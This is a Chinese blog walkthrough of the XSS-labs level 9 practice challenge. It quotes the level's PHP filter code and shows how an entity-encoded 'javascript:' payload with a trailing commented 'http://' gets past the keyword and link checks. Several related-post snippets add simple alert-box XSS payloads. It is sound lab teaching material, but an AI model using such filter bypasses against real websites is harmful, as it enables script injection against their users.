XSS-labs-level9

最新推荐文章于 2024-07-14 23:27:01 发布
最新推荐文章于 2024-07-14 23:27:01 发布
阅读量88 收藏 1
点赞数 1
分类专栏: XSS-labs 文章标签: xss 数学建模 matlab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/131120247
版权

访问题目url

我们还是经典语句起手

<script>alert('xss')</script>

 发现不好用,我们还是去网页源代码看一下。

 发现可能存在过滤,然后可能还有链接校验操作,不解释我们直接去看看源代码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
  • strtolower() 将输入值转换为小写。
  • str_replace() 删除一些可能用于XSS攻击的关键词,包括"script",“on”,“src”,“data"和"href”。
  • htmlspecialchars() 将字符转义为HTML实体,以防止XSS攻击。
  • if(false===strpos($str7,'http://'))匹配http://

感觉和 XSS-labs-level8差不多,但是加了”http://“校验。我们修改一下payload试一下。

http://javasc&#82;ipt:alert(1)

发现不太行,直接跳转到一个空白页了,应该是把语句当成网址跳转了,我们直接将http://放在最后,并且将它注释掉

javasc&#82;ipt:alert(1)//http://

 

仲瑿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS-labs1-5关
qq_64332865的博客
02-24 425
第一关 查看源代码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么就很明显,这一关主要就是考察反射型xss 但是由于不知道服务器端对于提交的敏感字符有没有过滤,所以这里直接在name参数 中赋值一个简单的弹窗来进行测试。 操作如下: 将name参数重新赋值:<script>alert( 'xss ')</ script> 点击确定,进入第二关 首先查看源代码 输入 <script>...
XSS-labs靶场
Vi_vids的博客
03-10 390
xss-labs靶场 Less-01 对于XSS漏洞,在实战中未避免因关键字被发现,多采用h5标签进行试探。 可以判断存在xss注入; 或者使用另一种payload Less-02
xss-labs/level9
m0_71299382的博客
11-29 309
xss-labs/level9
xss-labs/level10
m0_71299382的博客
11-29 204
xss-labs/level10
xss-labs之level9、level10
weixin_51520483的博客
05-28 264
它接受两个参数:要搜索的字符串(主字符串)和要查找的子串。如果找到子串,则函数返回子串在主字符串中首次出现的位置(从 0 开始计数);,但是并没有过滤HTML实体编码,所以我们还是使用编码绕过,但是传入的参数需要有‘http://’,所以在payload后面加上,并注释。发现有隐藏传参数t_link、t_history、t_sort,但input属性是hidden,所以需要修改为text属性。尝试了之前的payload,发现都不行,看源码发现多了个。发现并没有输入框,跳转链接,查看页面源码。
xss-labs/level6
m0_71299382的博客
11-29 289
xss-labs/level6
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
struts2如何防止XSS脚本攻击(XSS防跨站脚本攻击过滤器)
qq_37996327的博客
07-10 344
struts2如何防止XSS脚本攻击(XSS防跨站脚本攻击过滤器)
什么是XSS跨站脚本攻击
m0_70754056的博客
07-11 527
XSS 攻击方式多样,比如反射型 XSS,通过诱导用户点击包含恶意代码的特定链接来触发;存储型 XSS 则是将恶意代码长期存储在网站服务器,使得访问相关页面的用户都可能受到攻击。它指的是攻击者通过利用网站或应用程序对用户输入处理的漏洞,将恶意的脚本代码注入到网页中。当用户访问这些被注入恶意代码的页面时,浏览器会执行这些恶意脚本。也能篡改网页内容,误导用户进行错误操作,或者在用户的设备上执行其他恶意行为。为防范 XSS 攻击,网站开发者需严格审查用户输入,对数据进行恰当处理和转义。
熊海CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析
xt350488的博客
07-14 541
建议自定义错误页面,以避免编程语言特性导致的网站根目录泄露问题,从而减少不必要的安全风险。原文:https://mp.weixin.qq.com/s/NkyXg3Dm5ZzFUGpqn0uzBQ。
网络安全筑基篇——XSS、XML、XXE
weixin_55762309的博客
07-10 801
XSS、XXE、XML的区别
第一次参加数学建模竞赛新手小白备赛经验贴
m0_37228052的博客
07-11 948
2024年暑假已经来临,下半年的非常多,许多同学可能是第一次参赛,对于如何准备感到迷茫和无从下手。在这种情况下,我们将分享一些备赛的小技巧,帮助大家在这个暑假更好的入门,即便是零基础的小白也能在数学建模中得心应手。
数学建模美赛经验小结
hello!
07-10 350
图片资料来自网络所听讲座,感谢分享!
数学建模与优化】:解析与实践
最新发布
小李很执着的博客
07-14 344
数学建模是将复杂的现实问题转化为简化的数学问题,通过数学模型进行分析和解决的过程。数学模型的分类和应用领域广泛,通过合理利用资源,优化模型可以在工程、经济、管理等各个领域中发挥重要作用。通过实际问题中的应用实例,可以更好地理解和掌握优化模型的建立与分析方法。
2024辽宁省数学建模B题【钢铁产品质量优化】原创论文分享
smppbzyc的博客
07-14 380
大家好呀,从发布赛题一直到现在,总算完成了2024 年辽宁省大学数学建模竞赛B题钢铁产品质量优化完整的成品论文。 本论文可以保证原创,保证高质量。绝不是随便引用一大堆模型和代码复制粘贴进来完全没有应用糊弄人的垃圾半成品论文。 B题论文共47页,一些修改说明9页,正文33页,附录5页 这道题第一问先进行数据预处理也就是查找缺失值以及做数据描述性统计,对于数据先有一个整体认知,之后做相关性分析,给出每个参数和硬度的相关系数大小就可以识别影响程度大小。第二问一定要注意做的是机器学习分类预测而不是回归预测,这里
数学建模·Topsis优劣解&距离法
2301_80132162的博客
07-11 286
优劣解和距离法评价
xss-labs安装
07-28
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路即可,因为在实际的应用中,很少会有这种复杂的情况,但在CTF比赛中可能会更常见。 根据引用\[2\],XSS-labs的安装和下载可以通过相关的渗透测试平台或者从官方网站获取。安装完成后,可以开始进行XSS攻击的实践。 在XSS-labs中,可以通过构造特定的payload来触发XSS漏洞。根据引用\[2\]和\[3\]的示例,可以使用ng-include或者src参数来构造包含XSS漏洞的URL。例如,可以构造一个类似于以下的payload来触发XSS漏洞: src='level1.php?name=<a type="text" href="javascript:alert(1)">' 或者 127.0.0.1/xss-labs/level15.php?src='level1.php?name=<a href="javascript:alert(/xss/)">' 通过构造合适的payload,可以利用XSS-labs平台进行XSS攻击的实践和学习。请注意,在实际应用中,XSS攻击是违法行为,请遵守法律法规并仅在合法授权的情况下进行安全测试。 #### 引用[.reference_title] - *1* *2* [渗透学习-靶场篇-XSS-labs(持续更新中)](https://blog.csdn.net/qq_43696276/article/details/127024861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [xss-labs搭建及通关攻略](https://blog.csdn.net/K_ShenH/article/details/122765092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值